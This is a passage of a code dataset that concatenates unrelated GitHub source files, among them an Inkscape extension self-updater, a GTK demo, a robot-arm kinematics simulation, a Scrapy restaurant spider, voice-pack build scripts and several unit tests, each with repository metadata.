f.read()\n        if (re.match(\"__version__ = \\([0-9]+,[0-9]+,[0-9]+\\)\\n\",j)):\n            vstr = re.findall(\"[a-z_]+ = \\(([0-9]+),([0-9]+),([0-9]+)\\)\\n\",j)[0]\n            version = (int(vstr[0]),int(vstr[1]),int(vstr[2]))\n            inkex.debug(\"Current version : \" + str(version))\n            inkex.debug(\"Most recent version : \" + str(__version__))\n            pwd = os.path.dirname(os.path.realpath(__file__))\n            fd,zipn = tempfile.mkstemp()\n            urllib.urlretrieve(\"https://api.github.com/repos/\" + \\\n                               \"renaultd/lasercut/zipball/\", zipn)\n            zip = zipfile.ZipFile(zipn)\n            
ms = [ m for m in zip.namelist() if re.match(\".*\\.(py|inx)\",m) ]\n t = tempfile.mkdtemp()\n for m in ms:\n inkex.debug(m)\n zip.extract(m,t)\n shutil.copy(os.path.join(t,m), pwd)\n os.close(fd)\n os.remove(zipn)\n shutil.rmtree(t)\n else:\n inkex.debug(\"Unable to fetch distant repository\")\n\neffect = UpdateEffect()\neffect.affect()\n","repo_name":"allali/lasercut","sub_path":"lc_update.py","file_name":"lc_update.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29681950676","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nclass MainWindow(Gtk.Window):\n def __init__(self):\n Gtk.Window.__init__(self,title=\"ApplicationX\")\n \n #Boxes\n self.box = Gtk.Box(spacing=10)\n self.add(self.box)\n\n #bouton & entry\n self.bouton = Gtk.Button(label=\"test\")\n self.case = Gtk.Entry()\n self.bouton.connect(\"clicked\",self.bouton_clique)\n self.case.set_text(\"Texte\")\n self.box.pack_start(self.case,True,True,0)\n self.box.pack_start(self.bouton,True,True,0)\n \n\n def bouton_clique(self, widget):\n\t txt = self.case.get_text()\n\t print(txt)\n\n\nwindow = MainWindow()\nwindow.connect(\"delete-event\",Gtk.main_quit)\nwindow.show_all()\nGtk.main()\n","repo_name":"TuxStory/Python3","sub_path":"Python 3 GTK3 Tutoriel/Gtk_test1.py","file_name":"Gtk_test1.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70466883665","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom multiprocessing import Process, Queue\nimport time\nimport queue\nimport pandas as pd\nimport json\n\n\nclass Robot_Element:\n def update_dh_matrix(self, theta_i, sigma_i, lamda_i, alpha_i):\n dh_array = np.zeros((4, 4))\n\n dh_array[0][0] = np.cos(theta_i)\n dh_array[0][1] = -np.sin(theta_i)*np.cos(alpha_i)\n dh_array[0][2] = np.sin(theta_i)*np.sin(alpha_i)\n dh_array[0][3] = lamda_i*np.cos(alpha_i)\n\n dh_array[1][0] = np.sin(theta_i)\n dh_array[1][1] = np.cos(theta_i)*np.cos(alpha_i)\n dh_array[1][2] = -np.cos(theta_i)*np.sin(alpha_i)\n dh_array[1][3] = lamda_i*np.sin(alpha_i)\n\n dh_array[2][1] = np.sin(alpha_i)\n dh_array[2][2] = np.cos(alpha_i)\n dh_array[2][3] = sigma_i\n\n dh_array[3][3] = 1\n\n dh_matrix = np.matrix(dh_array)\n return dh_matrix\n\n\n def __init__(self, theta_i, sigma_i, lamda_i, alpha_i, dh_matrix_old=None):\n self.update(theta_i, sigma_i, lamda_i, alpha_i, dh_matrix_old)\n\n\n def update(self, theta_i, sigma_i, lamda_i, alpha_i, dh_matrix_old=None):\n self.dh_matrix = self.update_dh_matrix(theta_i, sigma_i, lamda_i, alpha_i)\n \n if dh_matrix_old is None:\n self.orientation_matrix = self.dh_matrix\n else:\n self.orientation_matrix = dh_matrix_old * self.dh_matrix\n\n self.point = [self.orientation_matrix[0, 3], # x\n self.orientation_matrix[1, 3], # y\n self.orientation_matrix[2, 3]] # z\n\n\n def get_orientation_matrix(self):\n return self.orientation_matrix\n\n\n def get_point(self):\n return self.point\n\n\nclass RRP_Robot:\n def __init__(self, oop_robot_data):\n # constant attributes\n elements_lengths_data = oop_robot_data[\"elements_lengths\"]\n self.l1 = elements_lengths_data[\"l1\"]\n self.l2 = elements_lengths_data[\"l2\"]\n\n # limitations\n limitations_data = oop_robot_data[\"limitations\"]\n self.theta1_min = 
limitations_data[\"theta1_min\"]\n self.theta1_max = limitations_data[\"theta1_max\"]\n self.theta2_min = limitations_data[\"theta2_min\"]\n self.theta2_max = limitations_data[\"theta2_max\"]\n self.sigma_min = limitations_data[\"sigma_min\"]\n self.sigma_max = limitations_data[\"sigma_max\"]\n\n # working area\n working_area_data = oop_robot_data[\"working_area\"]\n self.center = np.array(working_area_data[\"center\"])\n self.radius = working_area_data[\"radius\"]\n\n # variable attributes\n initial_position_data = oop_robot_data[\"initial_position\"]\n self.theta1 = initial_position_data[\"theta1\"]\n self.theta2 = initial_position_data[\"theta2\"]\n self.sigma = initial_position_data[\"sigma\"]\n\n # Denavit - Hartenberg notation array for RRP robot\n self.dh_notation_array = self.__create_dh_notation_array(self.theta1, self.theta2, self.sigma)\n\n # Create segments of RRP robot arm\n self.elements = self.__create_robot_elements(self.dh_notation_array)\n\n\n def __create_dh_notation_array(self, theta1, theta2, sigma):\n # Denavit - Hartenberg notation array for RRP robot\n # theta sigma lamda alpha\n dh_notation_array = np.array([[theta1, self.l1, 0, np.pi/2],\n [theta2, 0, 0, -np.pi/2],\n [-np.pi/2, 0, 0, 0 ],\n [0, 0, 0, -np.pi/2],\n [0, self.l2 + sigma, 0, 0]])\n return dh_notation_array\n\n\n def __create_robot_elements(self, dh_notation_array):\n elements = []\n for i in range(len(dh_notation_array)):\n theta_i, sigma_i, lambda_i, alpha_i = dh_notation_array[i]\n if i == 0:\n orientation_matrix = None\n else:\n orientation_matrix = elements[-1].get_orientation_matrix()\n element = Robot_Element(theta_i, sigma_i, lambda_i, alpha_i, orientation_matrix)\n elements.append(element)\n return elements\n\n\n def update(self, new_theta1, new_theta2, new_sigma):\n # Denavit - Hartenberg notation array for RRP robot\n self.dh_notation_array = self.__create_dh_notation_array(new_theta1, new_theta2, new_sigma)\n\n # Create segments of RRP robot arm\n self.elements = self.__create_robot_elements(self.dh_notation_array)\n\n\n def get_joint_points(self):\n points_x = [0] \n points_y = [0]\n points_z = [0]\n for element in self.elements:\n point = element.get_point()\n points_x.append(point[0])\n points_y.append(point[1])\n points_z.append(point[2])\n points_x_arr = np.array(points_x)\n points_y_arr = np.array(points_y)\n points_z_arr = np.array(points_z)\n return points_x_arr, points_y_arr, points_z_arr\n\n\n def __check_variables_borders(self):\n if self.theta1 < self.theta1_min:\n self.theta1 = self.theta1_min\n elif self.theta1 > self.theta1_max:\n self.theta1 = self.theta1_max\n\n if self.theta2 < self.theta2_min:\n self.theta2 = self.theta2_min\n elif self.theta2 > self.theta2_max:\n self.theta2 = self.theta2_max\n\n if self.sigma < self.sigma_min:\n self.sigma = self.sigma_min\n elif self.sigma > self.sigma_max:\n self.sigma = self.sigma_max\n\n\n def forward_kinematic(self, new_theta1, new_theta2, new_sigma):\n self.theta1 = new_theta1\n self.theta2 = new_theta2\n self.sigma = new_sigma\n self.__check_variables_borders()\n self.update(self.theta1, self.theta2, self.sigma)\n\n\n def inverse_kinematic(self, new_x, new_y, new_z):\n self.theta1, self.theta2, self.sigma = self.get_inverse_kinematic_variables(new_x, new_y, new_z)\n self.update(self.theta1, self.theta2, self.sigma)\n\n\n def get_inverse_kinematic_variables(self, new_x, new_y, new_z):\n theta1 = np.arctan2(new_y, new_x)\n sigma = np.sqrt(new_x**2 + new_y**2 + (new_z-self.l1)**2) - self.l2\n theta2 = np.arcsin((new_z - 
self.l1)/(self.l2 + sigma))\n        return theta1, theta2, sigma\n\n\n    def get_current_variables(self):\n        return self.theta1, self.theta2, self.sigma\n\n\n    def get_grasper_coordinates(self):\n        x_arr, y_arr, z_arr = self.get_joint_points()\n        return x_arr[-1], y_arr[-1], z_arr[-1]\n\n\n    def check_if_outside_working_area(self):\n        grasper_point = np.array(self.get_grasper_coordinates())\n        distance = np.sqrt(np.sum((grasper_point-self.center)**2, axis=0))\n        if distance > self.radius:\n            return True\n        else:\n            return False\n\n\n    def __plot_working_area(self, center=[1.5,0,1], radius=1, plane=0):\n        points_per_ring = 20\n        points_x = []\n        points_y = []\n        points_z = []\n        for j in range(points_per_ring):\n            if plane == 0:\n                points_x.append(radius*np.cos(2*np.pi*j/points_per_ring)+center[0])\n                points_y.append(radius*np.sin(2*np.pi*j/points_per_ring)+center[1])\n                points_z.append(center[2])\n            elif plane == 1:\n                points_y.append(radius*np.cos(2*np.pi*j/points_per_ring)+center[1])\n                points_z.append(radius*np.sin(2*np.pi*j/points_per_ring)+center[2])\n                points_x.append(center[0])\n            else:\n                points_z.append(radius*np.cos(2*np.pi*j/points_per_ring)+center[2])\n                points_x.append(radius*np.sin(2*np.pi*j/points_per_ring)+center[0])\n                points_y.append(center[1])\n        points_x.append(points_x[0])\n        points_y.append(points_y[0])\n        points_z.append(points_z[0])\n        points_x_arr = np.array(points_x)\n        points_y_arr = np.array(points_y)\n        points_z_arr = np.array(points_z)\n        return points_x_arr, points_y_arr, points_z_arr\n\n\n    def plot_working_area(self, plane):\n        return self.__plot_working_area(self.center, self.radius, plane)\n\n\nclass Visual_Controller:\n    def __init__(self, rrp_robot, intermediate_thetas1, intermediate_thetas2, intermediate_sigmas):\n        self.rrp_robot = rrp_robot\n        self.update_ml_to_vis(intermediate_thetas1, intermediate_thetas2, intermediate_sigmas)\n\n\n    def update_ml_to_vis(self, intermediate_thetas1, intermediate_thetas2, intermediate_sigmas):\n        self.intermediate_thetas1 = intermediate_thetas1\n        self.intermediate_thetas2 = intermediate_thetas2\n        self.intermediate_sigmas = intermediate_sigmas\n        self.intermediate_steps = len(intermediate_sigmas)\n        self.block_visualization = False\n        self.current_step = 0\n\n\n    def update_vis_to_ml(self):\n        self.block_visualization = True\n\n\n    def increment_step(self):\n        self.current_step+=1\n\n\ndef visual(qsv, qvs):\n    class Pack:\n        def __init__(self, visual_controller):\n            self.visual_controller = visual_controller\n\n    visual_controller = qsv.get()\n    pack = Pack(visual_controller)\n\n    # Prepare figure\n    fig = plt.figure(num=None, figsize=(8, 6))\n    ax = fig.gca(projection='3d')\n\n    # not working anymore?\n    # Set equal grid\n    # extents = np.array([getattr(ax, 'get_{}lim'.format(dim))() for dim in 'xyz'])\n    # sz = extents[:,1] - extents[:,0]\n    # centers = np.mean(extents, axis=1)\n    # maxsize = max(abs(sz))\n    # r = maxsize/2\n    # for ctr, dim in zip(centers, 'xyz'):\n    #     getattr(ax, 'set_{}lim'.format(dim))(ctr - r, ctr + r)\n\n    # Line for robot\n    line, = ax.plot([], [], [], 'b-o')\n    line2, = ax.plot([], [], [], 'r')\n    line3, = ax.plot([], [], [], 'r')\n    line4, = ax.plot([], [], [], 'r')\n\n    # Set axes\n    ax.set_xlim([-3, 3])\n    ax.set_ylim([-3, 3])\n    ax.set_zlim([ 0, 3])\n    ax.set_xlabel('X[m]')\n    ax.set_ylabel('Y[m]')\n    ax.set_zlabel('Z[m]')\n\n    def print_useful_data(pack):\n        # coordinates of all joints\n        # all variables\n        # grasper is in working area\n        print(\"O>xxx<[=]>xxx<[=]>xxx<[=]>xxx<[=]>xxxxxx<[=]>xxx<[=]>xxx<[=]>xxx<[=]>xxx<O\")\n        print(\"Joint points (x, y, z): \", pack.visual_controller.rrp_robot.get_joint_points())\n        print(\"Variables (theta1, theta2, sigma): \", pack.visual_controller.rrp_robot.get_current_variables())\n        print(\"Grasper outside working area: \", pack.visual_controller.rrp_robot.check_if_outside_working_area())\n\n    def animate(i, pack):\n        # assumed behavior: fetch new targets when blocked, otherwise advance\n        # one precomputed interpolation step and redraw the arm\n        if pack.visual_controller.block_visualization:\n            try:\n                pack.visual_controller = qsv.get(block=False)\n            except queue.Empty:\n                pass\n        else:\n            step = pack.visual_controller.current_step\n            theta1 = pack.visual_controller.intermediate_thetas1[step]\n            theta2 = pack.visual_controller.intermediate_thetas2[step]\n            sigma = pack.visual_controller.intermediate_sigmas[step]\n            pack.visual_controller.rrp_robot.forward_kinematic(theta1, theta2, sigma)\n            points_x, points_y, points_z = pack.visual_controller.rrp_robot.get_joint_points()\n            line.set_data(points_x, points_y)\n            line.set_3d_properties(points_z)\n            for plane, ring in enumerate((line2, line3, line4)):\n                ring_x, ring_y, ring_z = pack.visual_controller.rrp_robot.plot_working_area(plane)\n                ring.set_data(ring_x, ring_y)\n                ring.set_3d_properties(ring_z)\n            print_useful_data(pack)\n            pack.visual_controller.increment_step()\n            if pack.visual_controller.current_step >= pack.visual_controller.intermediate_steps:\n                
pack.visual_controller.update_vis_to_ml()\n qvs.put(pack.visual_controller)\n\n return line, line2\n\n # Run animation\n ani = animation.FuncAnimation(fig, animate, fargs=(pack,), interval=50, blit=False)\n plt.show()\n\n\ndef simulation(oop_robot_data):\n # Prepare objects for simulation and visualization\n rrp_robot = RRP_Robot(oop_robot_data)\n visual_controller = Visual_Controller(rrp_robot, [0], [0], [0])\n\n # Start plotting process\n qsv, qvs = Queue(), Queue()\n p = Process(target=visual, args=(qsv, qvs,))\n p.start()\n qsv.put(visual_controller)\n\n # Main loop of simulation \n while True:\n visual_controller = qvs.get()\n\n # Get variables values:\n print(\"Provide values:\")\n forward_or_inverse = int(input()) # 1->forward, 0->inverse\n new_theta1_or_new_x = float(input())\n new_theta2_or_new_y = float(input())\n new_sigma_or_new_z = float(input())\n intermediate_steps = int(input())\n # forward_or_inverse = 1 # 1->forward, 0->inverse\n # new_theta1_or_new_x = 90\n # new_theta2_or_new_y = 45\n # new_sigma_or_new_z = 0.75\n # intermediate_steps = 10\n\n # Get current variables values:\n old_theta1, old_theta2, old_sigma = visual_controller.rrp_robot.get_current_variables()\n\n # Prepare new variables values:\n if forward_or_inverse == 1: # Forward kinematic\n new_theta1 = np.deg2rad(new_theta1_or_new_x)\n new_theta2 = np.deg2rad(new_theta2_or_new_y)\n new_sigma = new_sigma_or_new_z\n else: # Inverse kinematic\n new_x, new_y, new_z = new_theta1_or_new_x, new_theta2_or_new_y,new_sigma_or_new_z\n new_theta1, new_theta2, new_sigma = visual_controller.rrp_robot.get_inverse_kinematic_variables(new_x, new_y, new_z)\n\n # Get intermediate variables values:\n intermediate_thetas1 = np.linspace(old_theta1, new_theta1, intermediate_steps)\n intermediate_thetas2 = np.linspace(old_theta2, new_theta2, intermediate_steps)\n intermediate_sigmas = np.linspace(old_sigma, new_sigma, intermediate_steps)\n\n visual_controller.update_ml_to_vis(intermediate_thetas1, intermediate_thetas2, intermediate_sigmas)\n qsv.put(visual_controller)\n\n p.join()\n\n\nif __name__ == \"__main__\":\n oop_robot_data = json.load(open(\"oop_robot_data.json\", \"r\"))\n simulation(oop_robot_data)","repo_name":"Zekhire/oop_robot_simulation","sub_path":"oop_robot_simulation.py","file_name":"oop_robot_simulation.py","file_ext":"py","file_size_in_byte":16448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13997088064","text":"from scrapy.spider import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\n\nfrom myproject.items import Restaurant\n\nclass TabelogSpoider(CrawlSpider):\n name = 'tabelog'\n allowed_domains = [\n \"tabelog.com\"\n ]\n start_urls = [\n 'https://tabelog.com/tokyo/rstLst/lunch/?LstCosT=2&RdoCosTp=1'\n ]\n rules = [\n Rule(LinkExtractor(allow=r'/\\w+/rstLst/lunch/\\d/')),\n Rule(LinkExtractor(allow=r'/\\w+/A\\d+/A\\d+/\\d+/$'), callback='parse_restaurant'),\n ]\n\n def parse_restaurant(self, response):\n latitude, longitude = response.css('img.js-map-lazyload::attr(\"data-original\")').re(r'markers=.*?%7C([\\d.]+),([\\d.]+)')\n\n item = Restaurant(\n name=response.css('.display-name').xpath('string()').extract_first().strip(),\n address=response.css('[class=\"rstinfo-table__address\"]').xpath('string()').extract_first(),\n latitude = latitude,\n longitude = longitude,\n station = response.css('[class=\"linktree__parent-target-text\"]').xpath('string()').extract_first(),\n score = 
response.css('[class=\"rdheader-rating__score-val-dtl\"]').xpath('string()').extract_first(),\n )\n\n return item","repo_name":"yohei29/myproject","sub_path":"myproject/spiders/tabelog.py","file_name":"tabelog.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19305827193","text":"import unittest\n\nimport jsonschema\nfrom lsst.ts import mtrotator, salobj\n\n\nclass ValidationTestCase(unittest.TestCase):\n \"\"\"Test validation of the config schema.\"\"\"\n\n def setUp(self):\n self.schema = mtrotator.CONFIG_SCHEMA\n self.validator = salobj.StandardValidator(schema=self.schema)\n self.default = dict(\n max_ccw_following_error=2.2,\n num_ccw_following_errors=3,\n host=\"rot-pxi-controller.cp.lsst.org\",\n port=5570,\n connection_timeout=10,\n )\n\n def test_basics(self):\n config = dict(\n max_ccw_following_error=1.5,\n num_ccw_following_errors=1,\n host=\"foo.bar\",\n port=25,\n connection_timeout=0.5,\n )\n self.validator.validate(config)\n\n def test_invalid_configs(self):\n for name, badval in (\n (\"max_ccw_following_error\", \"oops\"), # Wrong type\n (\"max_ccw_following_error\", 0), # Not positive\n (\"num_ccw_following_error\", \"oops\"), # Wrong type\n (\"num_ccw_following_error\", 0), # Not positive\n ):\n bad_data = {name: badval}\n with self.subTest(bad_data=bad_data):\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n self.validator.validate(bad_data)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lsst-ts/ts_mtrotator","sub_path":"tests/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15419226505","text":"import shutil\nfrom pathlib import Path\nimport os\n\n\n#define a function & pass dst. directory and src. directories\ndef merge_directories(new_directory_name, *directories_to_merge):\n if not os.path.exists(new_directory_name):\n os.makedirs(new_directory_name) #create a dst. 
directory if not exist\n\n for directory in directories_to_merge: \n for item in os.listdir(directory): #iterate sub-directory from source folders\n #join path of folder and sub-folder\n s = os.path.join(directory, item)\n d = os.path.join(new_directory_name, item)\n if os.path.isdir(s):\n if item in os.listdir(new_directory_name):\n files = os.listdir(s)\n for file in files: #iterate file from sub-folder\n j = os.path.join(s, file)\n k = os.path.join(d, file)\n shutil.copy2(j,k) #paste file in already existed sub-directory\n else:\n shutil.copytree(s, d) #create a sub-directory in dst directory then paste file\n else:\n shutil.copy2(s, d) #paste file in already existed sub-directory\n\nVPVEM_path = Path(\"G:\\World of Warcraft\\_retail_\\Interface\\AddOns\\DBM-VPVEM\")\nVPVEM_JSON_path = Path(\"G:\\World of Warcraft\\_retail_\\Interface\\AddOns\\DBM-VPVEM\\DBM-VPVEM-REF.json\")\nVPGEN_path = Path(\"G:\\Dev\\WOW-VoicePack-Generator\")\nADDON_path = Path(\"G:\\Dev\\DBM-VoicePack\")\nTMPDIR_path = Path(\"G:\\Dev\\WOW-VoicePack-Generator\\\\tmp-dbm-output\")\nSOUNDSDIR_path = Path(\"G:\\Dev\\WOW-VoicePack-Generator\\dbm-dictionaries\\sounds\")\n\ncmdoggfilesupdatevoicepack = VPGEN_path / \"scripts\" / \"cmd-oggfiles-update-voicepack.py\"\ncmdoggfilescreatevoicepack = VPGEN_path / \"scripts\" / \"cmd-oggfiles-create-voicepack.py\"\n\n\nparams = []\n\nEN_VP_JSON_PATH = VPGEN_path / \"dbm-dictionaries\" / \"dbm-vp-en.json\"\nFR_VP_JSON_PATH = VPGEN_path / \"dbm-dictionaries\" / \"dbm-vp-fr.json\"\n\ncfgFemaleFR = VPGEN_path / \"my-audio-configs\" / \"aws-fr-female-cfg.json\"\naddonFemaleFR = ADDON_path / \"DBM-VPFrenchFemale\"\nparams.append([cfgFemaleFR,addonFemaleFR,FR_VP_JSON_PATH])\n\ncfgMaleFR = VPGEN_path / \"my-audio-configs\" / \"aws-fr-male-cfg.json\"\naddonMaleFR = ADDON_path / \"DBM-VPFrenchMale\"\nparams.append([cfgMaleFR,addonMaleFR,FR_VP_JSON_PATH])\n\ncfgFemaleEN = VPGEN_path / \"my-audio-configs\" / \"aws-en-female-cfg.json\"\naddonFemaleEN = ADDON_path / \"DBM-VPEnglishFemale\"\nparams.append([cfgFemaleEN,addonFemaleEN,EN_VP_JSON_PATH])\n\ncfgMaleEN = VPGEN_path / \"my-audio-configs\" / \"aws-en-male-cfg.json\"\naddonMaleEN = ADDON_path / \"DBM-VPEnglishMale\"\nparams.append([cfgMaleEN,addonMaleEN,EN_VP_JSON_PATH])\n\n\n#Update pkg\nfor param in params:\n\n CFG = param[0]\n ADDON = param[1]\n VP_JSON_PATH = param[2]\n ADDON_JSON = ADDON / \"dictionary.json\"\n\n cmd = f\"python \\\"{cmdoggfilesupdatevoicepack}\\\" -c {CFG} {VP_JSON_PATH} {ADDON_JSON} -o {TMPDIR_path} -e AWS\"\n print(cmd)\n os.system(cmd)\n merge_directories(TMPDIR_path, SOUNDSDIR_path)\n merge_directories(ADDON, TMPDIR_path)\n shutil.rmtree(TMPDIR_path)\n os.mkdir(TMPDIR_path) \n\n# Generate all files\n# for param in params:\n\n# CFG = param[0]\n# ADDON = param[1]\n# VP_JSON_PATH = param[2]\n\n# cmd = f\"python \\\"{cmdoggfilescreatevoicepack}\\\" -e AWS -c {CFG} -o {TMPDIR_path} {VP_JSON_PATH}\"\n# print(cmd)\n# os.system(cmd)\n# merge_directories(TMPDIR_path, SOUNDSDIR_path)\n# merge_directories(ADDON, TMPDIR_path)\n# shutil.rmtree(TMPDIR_path)\n# os.mkdir(TMPDIR_path) \n ","repo_name":"acharnoz/DBM-VoicePack-FrenchFemale","sub_path":"scripts/update-voicepacks.py","file_name":"update-voicepacks.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9160279619","text":"from main import Job\nfrom tkinter import *\nroot=Tk()\n\nclass Aplicacao():\n def __init__(self):\n self.root=root\n self.Tela()\n 
self.Frame()\n self.BT()\n root.mainloop()\n def Tela(self):\n self.root.title('Alerta BTL')\n self.root.configure(background='black')\n self.root.geometry('300x200')\n self.root.maxsize(width=1280,height=1024)\n def Frame(self):\n self.Main=Frame(self.root,bg= 'white',highlightbackground='black')\n self.Main.place(relx= 0.01, rely=0.01, relwidth= 0.98, relheight=0.98)\n def BT(self):\n self.btaction=Button(self.Main,text='Disparar',command=Job)\n self.btaction.place(relx=0.25,rely=0.2,relwidth=0.5,relheight=0.2)\n\n def Quit(): self.root.destroy()\n self.btpara=Button(self.Main,text='Parar',command=Quit)\n self.btpara.place(relx=0.25, rely=0.6, relwidth=0.5, relheight=0.2)\n\nAplicacao()\n","repo_name":"santosgv/WebScript_observer","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35021261885","text":"import SM\nimport re\nimport json\n\nf= json.loads(open('j.json').read()) \ng= json.loads(open('data.json').read())\n\na=SM.BuildStructure(f)\n#__SearchTree(a)\nb=SM.BuildStructure(g)\nSM.StructureMatch(a,b)\nprint(b.grade)\nprint(SM.SearchTree(b))\ndic=SM.SearchTree(b)\n\nexp_file=open('example.html','r')\nout_file=open('out.html','w')\nfor i in exp_file:\n tmp=i\n for key in dic:\n tmp=re.sub('\"'+key+'\"','\"'+dic[key]+'\"',tmp)\n print(tmp)\n print(tmp,end='',file=out_file)\nout_file.close()\nexp_file.close()\n","repo_name":"hikaInf155/HIKA","sub_path":"match/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23359977237","text":"import sys\nimport os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nimport unittest\nimport unittest.mock as mock\nfrom unittest.mock import patch\nfrom unittest.mock import MagicMock\nfrom flask_socketio import ConnectionRefusedError\nfrom sqlalchemy.exc import SQLAlchemyError\n\nsys.path.insert(1, join(dirname(__file__), \"../\"))\nfrom bot import Bot\nimport helper_functions as hf\nimport bot_helper_functions as bhf\nimport server_comms\nimport models\n\nproject_id = 1\nimage_id = 1\ngoogle_json = 1\n\n\ndotenv_path = join(dirname(__file__), \"../keys/sql.env\")\n\ndatabase_uri = os.getenv(\"DATABASE_URL\")\n\nTAG = \"tag\"\nMESSAGE = \"message\"\nMESSAGE_SENT = \"message_sent\"\nROOM = \"room\"\nCHANGE = \"change\"\nCOUNT = \"count\"\nRESULT = \"result\"\nEMAIL = \"email\"\nNAME = \"name\"\nMSG = \"msg\"\nMSG_TYPE = \"msg_type\"\nDATA = \"data\"\nDT = \"dt\"\nDT_NOW = datetime.strptime(\"2020-10-15 13:57:02.043000\", \"%Y-%m-%d %H:%M:%S.%f\")\nTYPE = \"type\"\nREPLY = \"reply\"\nERR_MSG = \"err_msg\"\nSID = \"sid\"\nIMG = \"img\"\nLANG = \"lang\"\nRESPONSE = \"response\"\n\n\nclass MockUser:\n email = \"\"\n name = \"\"\n img = \"\"\n\n def __init__(self, email, name, pic):\n self.email = email\n self.name = name\n self.pic = pic\n\n def __repr__(self):\n return \"%s %s %s\" % (self.email, self.name, self.pic)\n\n\nclass MockMessage:\n dt = \"\"\n email = \"\"\n message = \"\"\n msg_type = \"\"\n\n def __init__(self, dt, email, message, msg_type):\n self.date_time = dt\n self.email = email\n self.message = message\n self.msg_type = msg_type\n\n\nclass MockedUnitTests(unittest.TestCase):\n def setUp(self):\n harry = MockUser(\"harry@gmail.com\", \"harry\", \"banana.png\")\n bobby = MockUser(\"bob@gmail.com\", \"bobby\", 
\"apple.png\")\n\n self.mock_users = [harry, bobby]\n message1 = MockMessage(DT_NOW, harry.email, \"hi\", \"text\")\n message2 = MockMessage(DT_NOW, bobby.email, \"hey\", \"text\")\n message3 = MockMessage(DT_NOW, bobby.email, \"hey\", \"text\")\n\n self.mock_messages = [message1, message2, message3]\n\n self.sc = server_comms.ServerComms(\n database_uri, project_id, image_id, google_json\n )\n\n self.chatBot = Bot(project_id, image_id, google_json, \"static/Robot.png\")\n\n self.mock_image_search_json = {\n \"total\": 4692,\n \"totalHits\": 500,\n \"hits\": [\n {\n \"id\": 195893,\n \"pageURL\": \"https://pixabay.com/en/blossom-bloom-flower-195893/\",\n \"type\": \"photo\",\n \"tags\": \"blossom, bloom, flower\",\n \"previewURL\": \"https://cdn.pixabay.com/photo/2013/10/15/09/12/flower-195893_150.jpg\",\n \"previewWidth\": 150,\n \"previewHeight\": 84,\n \"webformatURL\": \"https://pixabay.com/get/35bbf209e13e39d2_640.jpg\",\n \"webformatWidth\": 640,\n \"webformatHeight\": 360,\n \"largeImageURL\": \"https://pixabay.com/get/ed6a99fd0a76647_1280.jpg\",\n \"fullHDURL\": \"https://pixabay.com/get/ed6a9369fd0a76647_1920.jpg\",\n \"imageURL\": \"https://pixabay.com/get/ed6a9364a9fd0a76647.jpg\",\n \"imageWidth\": 4000,\n \"imageHeight\": 2250,\n \"imageSize\": 4731420,\n \"views\": 7671,\n \"downloads\": 6439,\n \"favorites\": 1,\n \"likes\": 5,\n \"comments\": 2,\n \"user_id\": 48777,\n \"user\": \"Josch13\",\n \"userImageURL\": \"https://cdn.pixabay.com/user/2013/11/05/02-10-23-764_250x250.jpg\",\n },\n {\"id\": 73424},\n ],\n }\n\n self.mock_image_search_json_error = self.mock_image_search_json.copy()\n self.mock_image_search_json_error.pop(\"totalHits\")\n\n self.success_send_message = [\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: None},\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: 1},\n ]\n\n self.success_update_room_count = [\n {CHANGE: 1, COUNT: 1, RESULT: 2},\n {CHANGE: -1, COUNT: 2, RESULT: 1},\n {CHANGE: -1, COUNT: 0, RESULT: 0},\n ]\n\n self.failure_send_message = [\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: None},\n {TAG: \"connected\", MESSAGE: \"hello\", ROOM: 1},\n ]\n\n self.success_record_message = [\n {EMAIL: \"r123@gmail.com\", MESSAGE: \"hi\", MSG_TYPE: \"text\", DT: DT_NOW}\n ]\n\n self.failure_record_message = [\n {EMAIL: \"r123@gmail.com\", MESSAGE: \"hi\", MSG_TYPE: \"text\", DT: DT_NOW}\n ]\n\n self.success_received_message = [\n {\n DATA: {\n EMAIL: \"r1@gmail.com\",\n DT: str(DT_NOW),\n MSG: \"hi\",\n MSG_TYPE: \"text\",\n }\n }\n ]\n\n self.success_chatbot_response = [\n {MSG: \"!! image rose\", REPLY: {TYPE: \"img\", DATA: \"rose.png\"}}\n ]\n\n self.failure_chatbot_response = [\n {\n MSG: \"!! image rose\",\n DT: DT_NOW,\n REPLY: {TYPE: \"img\", DATA: None},\n ERR_MSG: \"Bot experienced an error.\" \"Sorry for the inconvenience\",\n },\n {MSG: \"!! 
